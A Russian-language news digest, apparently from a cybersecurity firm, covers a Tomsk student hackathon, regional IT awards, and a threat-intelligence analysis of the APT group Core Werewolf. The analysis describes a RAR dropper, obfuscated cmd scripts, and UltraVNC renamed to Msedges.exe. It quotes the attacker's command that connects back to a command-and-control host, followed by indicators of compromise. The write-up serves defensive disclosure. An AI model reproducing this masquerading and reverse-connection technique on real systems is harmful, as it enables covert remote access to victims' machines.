5 сентября завершился хакатон ГОРОД IT: HACK 2025

В хакатоне приняли участие 70 студентов в составе 15 команд из вузов Томска. Наши эксперты на хакатоне — Эмиль Мирмаметов, ведущий разработчик, и Антон Ильин, тимлид команды разработки сценариев для Ampire.

Лучшей в выполнении кейсов стала команда bad bananas из Томского политехнического университета. Команда выполняла кейс 🐶ПМ по разработке инфраструктуры киберфизической модели космического лифта.

ℹ️Космический лифт — это интерактивный макет, который действует в иммерсивном пространстве единственного в мире постоянно действующего фиджитал-полигона в Кибердоме в Москве.

«ГОРОД IT: HACK – первый опыт выставления задач на хакатоне для ПМ. Команда bad bananas создала действительно интересное решение. Ребята разработали веб-систему, состоящую из нескольких сервисов, включая модуль управления космолифтом с показателями телеметрии, клиентское приложение для сбора заявок и сервис визуализации загрузки складских ячеек. При этом были выполнены даже задания со звёздочкой, в которых надо было предусмотреть в системе уязвимости, которые может проэксплуатировать хакер», - Антон Ильин, тимлид команды разработки сценариев для Ampire

В планах ПМ доработать решение, интегрировать его в платформу 🥇Ampire и апробировать на физическом макете космического лифта в Кибердоме.

Специалисты ПМ получили награды от Минцифры Кузбасса

12 сентября в преддверии Дня программиста состоялся IV региональный форум «Кузбасс в цифре», который стал важной площадкой для обсуждения актуальных вопросов цифровизации, внедрения современных технологических решений и перспектив развития цифровой инфраструктуры региона.

В рамках форума состоялось торжественное награждение ИТ-специалистов отраслевыми и региональными наградами, которыми был отмечен вклад в развитие цифровизации Кузбасса.

Награды получили специалисты ПМ:

🟠руководитель учебно-методического направления Александр Фефилов — нагрудный знак «За цифровое развитие Кузбасса»,
🟠менеджер продукта «Экспертные данные» Кирилл Кузнецов — благодарственное письмо за личный вклад в развитие цифровизации Кузбасса,
🟠заместитель начальника Центра мониторинга компьютерных атак Александр Клевцов — благодарственное письмо за личный вклад в развитие цифровизации Кузбасса.

Кирилл Кузнецов также выступил на форуме с докладом  «AM Threat Intelligence Portal — актуальные сведения о киберугрозах».

ℹ️ Организатором мероприятия выступает Министерство цифрового развития и связи Кузбасса, оператором — АНО «Развитие цифровой экономики Кузбасса».

Специалисты направления исследований киберугроз зафиксировали новую активность APT-группировки Core Werewolf

😀😀😀😀

Группировка Core Werewolf, также известные как Awaken Likho и PseudoGamaredon, применяет нестандартные способы маскировки

❗️Вектор атаки:
Несколько месяцев назад мы уже описывали популярный вектор атаки данной группировки с новыми модификациями ВПО.
В выявленной же недавно кампании злоумышленники снова начали применять особые методы обхода обнаружения.

Для первоначального доступа злоумышленники все также использовали вредоносный RAR-архив, внутри которого находился троян типа «дроппер» с наименованием «Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe». При запуске данного ВПО выполнялась распаковка файлов с названиями:
🟠«32193.YApCfK»
🟠«8152»
🟠«HUBfz5.MCUj1n»
🟠«ITrc7L.QpK2Yd»
🟠«dJ7hAl.diPznA»
Проведенный анализ показал, что файл с наименованием «8152» имеет расширение «.cmd». Отличительной чертой данного cmd-файла, по сравнению с ранее зафиксированными, являлось его содержимое (скриншот 1).

Злоумышленники использовали технику T1027.010: Obfuscated Files or Information: Command Obfuscation для скрытия выполняемых команд внутри файла. Так, названия файлов содержались в разных переменных. Собрав их вместе, можно обнаружить, что при запуске «8152.cmd»:
🟠Выполняется копирование файла «ITrc7L.QpK2Yd» в «Resul9.pdf». Сам Resul9.pdf является отвлекающим документом (скриншот 2)
🟠Файл «HUBfz5.MCUj1n» копируется в «UltraVNC.ini». По названию второго становится ясно, что это конфигурационный файл ПО «UltraVNC» (скриншот 3)
🟠Через команду /copy создается копия файла «dJ7hAl.diPznA» с новым наименованием «Msedges.exe»
🟠Выполняется проверка наличия в системе файла «32193.cmd». В случае, если файл обнаружен, происходит его запуск cmd /c %HOMEPATH%\Documents\32193.cmd

На следующем этапе, где злоумышленники используют все тот же способ маскировки (скриншот 4), через файл «32193.cmd» выполняется запуск «Msedges.exe» в директории %HOMEPATH%\Documents\ (T1036.005: Masquerading: Match Legitimate Resource Name or Location).

Далее используемый файл с функционалом UltraVNC запускается повторно с опциями автоматического восстановления C2-соединения: %HOMEPATH%\Documents\Msedges.exe -autoreconnect ID:_lzNjSq_%COMPUTERNAME% -connect autovekb96.ru:443
Кроме этого, анализ файлов «32193.cmd» и «8152.cmd» также показал, что злоумышленники применяют неоднократно команду timeout /t с разными значениями между выполнением других команд. Здесь злоумышленники используют еще одну технику маскировки — T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion

Специалисты Перспективного мониторинга продолжают отлеживать активность группировки Core Werewolf и актуализовать данные о ее методах и инструментах

❗️Индикаторы компрометации:
IP:

45.144.67[.]251

Domains:

autovekb96[.]ru

SHA256:

82f5e455ebce674b4382bf2e7d0c58d67a11af3f861ea4ee1c431013d5ffe85e (Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe/Latun.exe/mirolf.exe)
dce7e7ad8e3fa8d340bfa0fd5e0b8982878d20514e17ee3a9f31f46c4cd4debf (32193.cmd/32193.YApCfK)
0db6a2e14f5039f7d70cd2560a2a8df54e3053e52c467162ac51ae0653076bae (8152.cmd)
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24 (Msedges.exe/NPbJUS.EgQXPl/dJ7hAl.diPznA)
ef7c8f0e6c3b36d00a9a643a51b7cd94dc3a67be3c86a87973290be8a1ee6a15 (RAR-архив)

❗️В базах решающих правил AM Rules ПМ присутствуют детектирующие правила, позволяющие обнаружить не только конкретную описанную угрозу, но и предотвратить аналогичную активность злоумышленника в дальнейшем!

🔎Проверить собственные индикаторы компрометации на вредоносность с помощью AM TIP🔎

#AM_Rules